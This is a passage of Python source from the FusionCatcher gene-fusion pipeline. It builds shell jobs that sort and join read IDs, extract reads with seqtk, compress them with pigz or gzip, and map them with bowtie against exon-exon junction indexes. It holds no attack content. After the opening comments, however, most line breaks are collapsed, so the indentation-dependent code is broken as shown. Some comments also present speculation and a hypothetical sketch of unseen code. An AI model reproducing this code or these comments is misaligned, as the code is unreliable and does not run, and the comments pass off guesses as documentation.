#    job.add('--link','hard',kind='parameter')
#    job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq'),kind='input',temp_path=temp_flag)
#    job.add('--output',outdir('unmapped-reads.fq'),kind='output')
#    job.add('--input_type','illumina',kind='parameter')
#    job.add('--output_type','sanger',kind='parameter')
#    job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no')
#    job.run()
#
#    if pigz:
#        job.add('pigz',kind='program')
#        job.add('-p',options.processes,kind='parameter',checksum='no')
#    else:
#        job.add('gzip',kind='program')
#    job.add('-c',outdir('unmapped-reads.fq'),kind='input',temp_path=temp_flag)
#    job.add('>',outdir('unmapped-reads.fq.gz'),kind='output')
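# when '--keep-unmapped-reads' is used, all reads that still map nowhere are
# archived as unmapped-reads.fq.gz so they can be inspected or re-analysed
# later; the commented-out seqtk/phred.py/pigz lines above and below are an
# older variant of the same archiving step, apparently kept for reference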
# job.run() if double_bowtie and (not candidates): job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('candidate_fusion-genes_further_paired-reads.txt'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('original_important.txt'),kind='output') job.run() if not options.split_seqtk_subseq: job.add(_FC_+'extract_short_reads.py',kind='program') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.add('--input',outdir('originala.fq.gz'),kind='input') job.add('--list',outdir('original_important.txt'),kind='input') job.add('--output',outdir('original_important.fq.gz'),kind='output') job.run(error_message = ("If this fails (again?) due to a memory error (e.g. not enough free memory) then lowering the "+ "buffer size for specifically this script might help. This can be done by using the FusionCatcher's "+ "command line option '--extra-buffer-size "+str(int(options.extract_buffer_size)/2)+"' .")) elif options.split_seqtk_subseq == 1: job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('originala.fq.gz'),kind='input') job.add('',outdir('original_important.txt'),kind='input') job.add('|',kind='parameter') if pigz: job.add(_PZ_+'pigz',kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') else: job.add('gzip',kind='parameter') job.add('--fast',kind='parameter') #job.add('-c',outdir('unmapped-reads.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('original_important.fq.gz'),kind='output') job.run() elif options.split_seqtk_subseq > 1: #extract the short reads which mapped on genome job.add(_FC_+'seqtk-subseq.sh',kind='program') job.add('',_SK_ if _SK_ else '-',kind='parameter') job.add('',_PL_ if _PL_ else '-',kind='parameter') job.add('',options.split_seqtk_subseq,kind='parameter') job.add('',outdir('originala.fq.gz'),kind='input') job.add('',outdir('original_important.txt'),kind='input') job.add('-',kind='parameter') job.add('|',kind='parameter') if pigz: job.add(_PZ_+'pigz',kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') else: job.add('gzip',kind='parameter') job.add('--fast',kind='parameter') #job.add('-c',outdir('unmapped-reads.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('original_important.fq.gz'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. 
"+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) job.clean(outdir('originala.fq.gz'),temp_path=temp_flag) if job.iff(empty(outdir('reads_filtered_transcriptome_sorted-read_end.map')),id="###reads_filtered_transcriptome_sorted-read_end.map###"): job.add('touch',kind='program') job.add('',outdir('reads_filtered_transcriptome_sorted-read_end_important.map'),kind='output') job.run() job.clean(outdir('reads_filtered_transcriptome_sorted-read_end.map'),temp_path=temp_flag) else: job.add('LC_ALL=C',kind='program') job.add('join',kind='parameter') job.add('-1','1',kind='parameter') job.add('-2','1',kind='parameter') job.add('-t',"'\t'",kind='parameter') job.add('',outdir('original_important.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_transcriptome_sorted-read_end.map'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_transcriptome_sorted-read_end_important.map'),kind='output') job.run() if candidates: # extract reads ids job.add('LC_ALL=C',kind='program') job.add('awk',kind='parameter') job.add("'NR%4==1 {print substr($0,2)}'",outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.txt'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('awk',kind='parameter') job.add("""'{n=length($0); r=substr($0,1,n-2); print r}'""",kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.txt'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('reads_ids_unmapped.txt'),kind='output') job.run() # add also the mates to the unmapped reads (the mates may be mapping just fine) job.add('LC_ALL=C',kind='program') job.add('awk',kind='parameter') job.add("""'{n=length($0); r=substr($0,1,n-1); print r"1"; print r"2"}'""",kind='parameter') 
job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.txt'),kind='input',temp_path=temp_flag if not options.keep_unmapped_reads else 'no') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final2.txt'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final2.txt'),kind='input') job.add('',outdir('candidate_fusion-genes_further_paired-reads.txt'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('original_important.txt'),kind='output') job.run() if not options.split_seqtk_subseq: job.add(_FC_+'extract_short_reads.py',kind='program') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.add('--input',outdir('originala.fq.gz'),kind='input') job.add('--list',outdir('original_important.txt'),kind='input') job.add('--output',outdir('original_important.fq.gz'),kind='output') job.run(error_message = ("If this fails (again?) due to a memory error (e.g. not enough free memory) then lowering the "+ "buffer size for specifically this script might help. 
This can be done by using the FusionCatcher's "+ "command line option '--extra-buffer-size "+str(int(options.extract_buffer_size)/2)+"' .")) elif options.split_seqtk_subseq == 1: job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('originala.fq.gz'),kind='input') job.add('',outdir('original_important.txt'),kind='input') job.add('|',kind='parameter') if pigz: job.add(_PZ_+'pigz',kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') else: job.add('gzip',kind='parameter') job.add('--fast',kind='parameter') #job.add('-c',outdir('unmapped-reads.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('original_important.fq.gz'),kind='output') job.run() elif options.split_seqtk_subseq > 1: #extract the short reads which mapped on genome job.add(_FC_+'seqtk-subseq.sh',kind='program') job.add('',_SK_ if _SK_ else '-',kind='parameter') job.add('',_PL_ if _PL_ else '-',kind='parameter') job.add('',options.split_seqtk_subseq,kind='parameter') job.add('',outdir('originala.fq.gz'),kind='input') job.add('',outdir('original_important.txt'),kind='input') job.add('-',kind='parameter') job.add('|',kind='parameter') if pigz: job.add(_PZ_+'pigz',kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') else: job.add('gzip',kind='parameter') job.add('--fast',kind='parameter') #job.add('-c',outdir('unmapped-reads.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('original_important.fq.gz'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. "+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) job.clean(outdir('originala.fq.gz'),temp_path=temp_flag) # extract the line with reads which are important further from the transcriptome mapping # job.add('reads_from_map.py',kind='program') # job.add('--input_reads',outdir('original_important.txt'),kind='input',temp_path=temp_flag) # job.add('--input_map',outdir('reads_filtered_transcriptome_sorted-read_end.map'),kind='input',temp_path=temp_flag) # job.add('--output_map',outdir('reads_filtered_transcriptome_sorted-read_end_important.map'),kind='output') # job.add('--operation','extract',kind='parameter') # job.run() job.add('LC_ALL=C',kind='program') job.add('join',kind='parameter') job.add('-1','1',kind='parameter') job.add('-2','1',kind='parameter') job.add('-t',"'\t'",kind='parameter') job.add('',outdir('original_important.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_transcriptome_sorted-read_end.map'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_transcriptome_sorted-read_end_important.map'),kind='output') job.run() if options.keep_unmapped_reads: # # job.add('extract_reads_ids.py',kind='program') # job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq'),kind='input',temp_path=temp_flag) # job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.txt'),kind='output') # job.run() # extract the short reads which mapped on the transcriptome and do not map on genome # job.add('extract_short_reads.py',kind='program') # job.add('--input',outdir('original.fq.gz'),kind='input') # job.add('--list',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.txt'),kind='input',temp_path=temp_flag) # 
job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final_long.fq'),kind='output') # job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') # job.run(error_message = ("If this fails due to a memory error then lowering the "+ # "buffer size (to 50% or 25%) using the command line option --extra-buffer-size "+ # "of FusionCatcher and running it again might help!")) # job.add('phred.py',kind='program') # job.add('--link','hard',kind='parameter') # job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final_long.fq'),kind='input',temp_path=temp_flag) # job.add('--output',outdir('unmapped-reads.fq'),kind='output') # job.add('--input_type','illumina',kind='parameter') # job.add('--output_type','sanger',kind='parameter') # job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no') # job.run() if not options.split_seqtk_subseq: job.add(_FC_+'extract_short_reads.py',kind='program') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.add('--input',outdir('original_important.fq.gz'),kind='input') job.add('--list',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.txt'),kind='input') job.add('--output','-',kind='parameter',checksum='no') elif options.split_seqtk_subseq == 1: job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('original_important.fq.gz'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.txt'),kind='input') elif options.split_seqtk_subseq > 1: #extract the short reads which mapped on genome job.add(_FC_+'seqtk-subseq.sh',kind='program') job.add('',_SK_ if _SK_ else '-',kind='parameter') job.add('',_PL_ if _PL_ else '-',kind='parameter') job.add('',options.split_seqtk_subseq,kind='parameter') job.add('',outdir('original_important.fq.gz'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.txt'),kind='input') job.add('-',kind='parameter') #job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final_long.fq'),kind='output') #job.run() # convert FASTQ illumina to sanger #job.add('seqtk',kind='program') # job.add('|',kind='parameter') # job.add('seqtk',kind='parameter') # job.add('seq',kind='parameter') # job.add('-Q64',kind='parameter') # job.add('-V',kind='parameter') # job.add('-',kind='parameter') #job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final_long.fq'),kind='input',temp_path=temp_flag) #job.add('>',outdir('unmapped-reads.fq'),kind='output') #job.run() job.add('|',kind='parameter') if pigz: job.add(_PZ_+'pigz',kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') else: job.add('gzip',kind='parameter') job.add('--fast',kind='parameter') #job.add('-c',outdir('unmapped-reads.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('unmapped-reads.fq.gz'),kind='output') job.run() job.clean(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.txt'),temp_path=temp_flag) if not options.all_reads_junction: job.add(_FC_+'remove_reads_exon_exon_fastq.py',kind='program') job.add('--input_fastq',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq'),kind='input',temp_path=temp_flag) job.add('--input_fusions',outdir('candidate_fusion-genes_exon-exon.txt'),kind='input') job.add('--input_transcriptome',outdir('reads_filtered_transcriptome_sorted-read_end_important.map'),kind = 'input') 
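# an assumption about remove_reads_exon_exon_fastq.py (its code is not shown
# here): when '--all_reads_junction' is off, reads whose transcriptome
# mappings already place them fully within one gene of a candidate pair are
# presumably dropped at this step, so that only reads which could genuinely
# span an exon-exon junction remain in the output FASTQ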
job.add('--output_fastq',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final_plus.fq'),kind='output') job.add('--log',info_file,kind='output',checksum='no') job.run() else: job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final_plus.fq'), temp_path=temp_flag) # generate the exon-exon junctions job.add(_FC_+'generate_exon-exon_junctions.py',kind='program') job.add('--input_fusion_genes',outdir('candidate_fusion-genes_exon-exon.txt'),kind='input') job.add('--input_fasta_transcripts',datadir('transcripts.fa'),kind='input') job.add('--input_database_transcripts',datadir('transcripts.txt'),kind='input') job.add('--overlap_read',length_anchor_bowtie,kind='parameter') # :-) job.add('--unique_cut_sequences_same_pair',kind='parameter') #added job.add('--length_reads_filename',outdir('log_lengths_reads.txt'),kind='input') job.add('--output_cut_junction',outdir('exon-exon_junction_cut.fa'),kind='output') job.add('--output_count_seq',outdir('exon-exon_junction_cut__seq.txt'),kind='output') job.add('--output_count_nuc',outdir('exon-exon_junction_cut__nuc.txt'),kind='output') job.run() nucleotides_ee = int(float(file(outdir('exon-exon_junction_cut__nuc.txt'),"r").readline().strip())) # double_bowtie = False # if max_len_reads > min_len_reads: # double_bowtie = True parts = [] if nucleotides_ee > options.limit_bowtie: job.add(_FC_+'split-fasta.py',kind='program') job.add('--size',outdir('exon-exon_junction_cut__nuc.txt'),kind='input') job.add('--seqs',outdir('exon-exon_junction_cut__seq.txt'),kind='input') job.add('--threshold',options.limit_bowtie,kind='parameter') job.add('-i',outdir('exon-exon_junction_cut.fa'),kind='input') job.add('-o',outdir('exon-exon_junction_cut_split.fa'),kind='output') job.run() parts = [el.strip() for el in file(outdir('exon-exon_junction_cut_split.fa'),'r').readlines()] for i,part in enumerate(parts): # map the reads which do not align anywhere on the exon-exon junctions from fusion-genes # build index job.add(_BE_+'bowtie-build',kind='program') # if bowtie121: # job.add('--threads',options.processes,kind='parameter') job.add('-f',kind='parameter') job.add('--quiet',kind='parameter') if bowtie121: job.add('--threads',options.processes,kind='parameter') # job.add('--ntoa',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','5',kind='parameter') job.add('',part,kind='input') job.add('',part+'_dir/',kind='output') job.run() # map using the exon-exon fusion genes index (all possible mappings) job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') job.add('-k','1000',kind='parameter') job.add('-v',options.mismatches,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') if os.path.isfile(os.path.join(part+'_dir','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') #job.add('--solexa1.3-quals',kind='parameter') job.add('--un',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq.'+str(i)),kind='output',dest_list='exonexon_un') # here is the result job.add('--tryhard',kind='parameter') #job.add('--best',kind='parameter') job.add('',part+'_dir/',kind='input',temp_path='no' if double_bowtie else temp_flag) 
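# each 'part' indexed here stays below options.limit_bowtie nucleotides so
# that bowtie index building remains tractable; a hypothetical sketch of the
# greedy split rule assumed for split-fasta.py (illustrative only, not its
# actual code; read_fasta is a made-up helper):
#
#   parts, size = [[]], 0
#   for name, seq in read_fasta('exon-exon_junction_cut.fa'):
#       if size + len(seq) > limit_bowtie and parts[-1]:
#           parts.append([])
#           size = 0
#       parts[-1].append((name, seq))
#       size += len(seq)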
job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final_plus.fq'),kind='input') #job.add('',outdir('reads_mapped-exon-exon-fusion-genes.map'),kind='output') # <== mappings on exon-exon junctions for fusion genes ####### # XXX job.add('2>',outdir('log_bowtie_reads_mapped-exon-exon-fusion-genes_map.stdout.txt.'+str(i)),kind='output',checksum='no') #job.add('2>&1',kind='parameter',checksum='no') #job.run() job.add('|',kind='parameter') # sort the reads' mappings on exon-exon by reference sequence, i.e. # gene-gene,transcript-transcript,exon-exon job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') #job.add('-s',kind='parameter') # stable sort job.add('-t',"'\t'",kind='parameter') job.add('-k','3,3',kind='parameter') #job.add('',outdir('reads_mapped-exon-exon-fusion-genes.map'),kind='input',temp_path = temp_flag) # XXX job.add('>',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref.map.'+str(i)),kind='output',dest_list='exonexon') job.run() job.clean(outdir('log_bowtie_reads_mapped-exon-exon-fusion-genes_map.stdout.txt.'+str(i)),temp_path=temp_flag) if job.iff(empty(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq.'+str(i))),id="###reads_fnmgnmteef.fq."+str(i)+"###"): job.add('touch',kind='program') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq.'+str(i)),kind='output') job.run() job.clean(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final_plus.fq'),temp_path=temp_flag) job.sink(job.exonexon, outdir('exonexon.txt')) job.add(_FC_+'concatenate.py',kind='program') job.add('-f',outdir('exonexon.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref.map'),kind='output') job.run() job.clean(job.exonexon,temp_path=temp_flag) job.sink(job.exonexon_un, outdir('exonexon_un.txt')) job.add(_FC_+'concatenate.py',kind='program') job.add('-f',outdir('exonexon_un.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq'),kind='output') job.run() job.clean(job.exonexon_un,temp_path=temp_flag) else: # map the reads which do not align anywhere on the exon-exon junctions from fusion-genes # build index job.add(_BE_+'bowtie-build',kind='program') # if bowtie121: # job.add('--threads',options.processes,kind='parameter') job.add('-f',kind='parameter') job.add('--quiet',kind='parameter') if bowtie121: job.add('--threads',options.processes,kind='parameter') # job.add('--ntoa',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','5',kind='parameter') job.add('',outdir('exon-exon_junction_cut.fa'),kind='input') job.add('',outdir('exon-exon_fusion-genes/'),kind='output') job.run() # map using the exon-exon fusion genes index (all possible mappings) job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') job.add('-k','1000',kind='parameter') job.add('-v',options.mismatches,kind='parameter') 
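# bowtie 1 semantics for the options above: '-v N' reports only end-to-end
# alignments with at most N mismatches (base qualities are ignored), and
# '-k 1000' keeps up to 1000 valid alignments per read, so multi-mapping
# hits on homologous junctions survive for the downstream counting instead
# of being collapsed to a single alignment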
job.add('-p',options.processes,kind='parameter',checksum='no') if os.path.isfile(outdir('exon-exon_fusion-genes','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') #job.add('--solexa1.3-quals',kind='parameter') job.add('--un',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq'),kind='output') # here is the result job.add('--tryhard',kind='parameter') #job.add('--best',kind='parameter') job.add('',outdir('exon-exon_fusion-genes/'),kind='input',temp_path='no' if double_bowtie else temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final_plus.fq'),kind='input',temp_path=temp_flag) #job.add('',outdir('reads_mapped-exon-exon-fusion-genes.map'),kind='output') # <== mappings on exon-exon junctions for fusion genes ####### # XXX job.add('2>',outdir('log_bowtie_reads_mapped-exon-exon-fusion-genes_map.stdout.txt'),kind='output',checksum='no') #job.add('2>&1',kind='parameter',checksum='no') #job.run() job.add('|',kind='parameter') # sort the reads' mappings on exon-exon by reference sequence, i.e. # gene-gene,transcript-transcript,exon-exon job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') #job.add('-s',kind='parameter') # stable sort job.add('-t',"'\t'",kind='parameter') job.add('-k','3,3',kind='parameter') #job.add('',outdir('reads_mapped-exon-exon-fusion-genes.map'),kind='input',temp_path = temp_flag) # XXX job.add('>',outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref.map'),kind='output') job.run() job.clean(outdir('log_bowtie_reads_mapped-exon-exon-fusion-genes_map.stdout.txt'),temp_path=temp_flag) if job.iff(empty(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq')),id="###reads_fnmgnmteef.fq###"): job.add('touch',kind='program') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq'),kind='output') job.run() if candidates and (not double_bowtie): job.link(outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref.map'), outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref_big.map'), temp_path=temp_flag) job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final_big.fq'), temp_path=temp_flag) if double_bowtie: ######## # do again bowtie aligning if the reads are longer than my trimming ########## if job.iff(not(empty(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq'))),id="###reads-filtered-ng-nt-ex-ex-final###"): # here the un-mapped reads # extract reads ids job.add('LC_ALL=C',kind='program') job.add('awk',kind='parameter') job.add("'NR%4==1 {print substr($0,2)}'",outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq'),kind='input',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: 
job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('reads_transcriptome22.txt'),kind='output') job.run() else: job.add('touch',kind='program') job.add('',outdir('reads_transcriptome22.txt'),kind='output') job.run() job.add('cat',kind='program') job.add('',outdir('reads_transcriptome22.txt'),kind='input') job.add('',outdir('candidate_fusion-genes_further_paired-reads.txt'),kind='input') job.add('>',outdir('reads_transcriptome22_more.txt'),kind='output') job.run() if not options.split_seqtk_subseq: job.add(_FC_+'extract_short_reads.py',kind='program') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.add('--input',outdir('original_important.fq.gz'),kind='input') job.add('--list',outdir('reads_transcriptome22_more.txt'),kind='input',temp_path=temp_flag) job.add('--output',outdir('reads_filtered_psl_temp22.fq'),kind='output') job.run(error_message = ("If this fails (again?) due to a memory error (e.g. not enough free memory) then lowering the "+ "buffer size for specifically this script might help. This can be done by using the FusionCatcher's "+ "command line option '--extra-buffer-size "+str(int(options.extract_buffer_size)/2)+"' .")) elif options.split_seqtk_subseq == 1: job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('original_important.fq.gz'),kind='input') job.add('',outdir('reads_transcriptome22_more.txt'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_psl_temp22.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. "+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) elif options.split_seqtk_subseq > 1: job.add(_FC_+'seqtk-subseq.sh',kind='program') job.add('',_SK_ if _SK_ else '-',kind='parameter') job.add('',_PL_ if _PL_ else '-',kind='parameter') job.add('',options.split_seqtk_subseq,kind='parameter') job.add('',outdir('original_important.fq.gz'),kind='input') job.add('',outdir('reads_transcriptome22_more.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_psl_temp22.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. 
"+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) if not candidates: # generate the exon-exon junctions job.add(_FC_+'generate_exon-exon_junctions.py',kind='program') job.add('--input_fusion_genes',outdir('candidate_fusion-genes_exon-exon.txt'),kind='input') job.add('--input_fasta_transcripts',datadir('transcripts.fa'),kind='input') job.add('--input_database_transcripts',datadir('transcripts.txt'),kind='input') job.add('--overlap_read',length_anchor_bowtie,kind='parameter') # :-) job.add('--unique_cut_sequences_same_pair',kind='parameter') #added job.add('--length_reads_filename',outdir('log_lengths_reads.txt'),kind='input') job.add('--output_cut_junction',outdir('exon-exon_junction_cut.fa'),kind='output') job.add('--output_count_seq',outdir('exon-exon_junction_cut__seq.txt'),kind='output') job.add('--output_count_nuc',outdir('exon-exon_junction_cut__nuc.txt'),kind='output') job.run() nucleotides_ee = int(float(file(outdir('exon-exon_junction_cut__nuc.txt'),"r").readline().strip())) job.add(_SK_+'seqtk',kind='program') job.add('trimfq',kind='parameter') job.add('-l','1',kind='parameter') job.add('-E',options.trim_3end_keep,kind='parameter') job.add('',outdir('reads_filtered_psl_temp22.fq'),kind='input') job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('seq',kind='parameter') 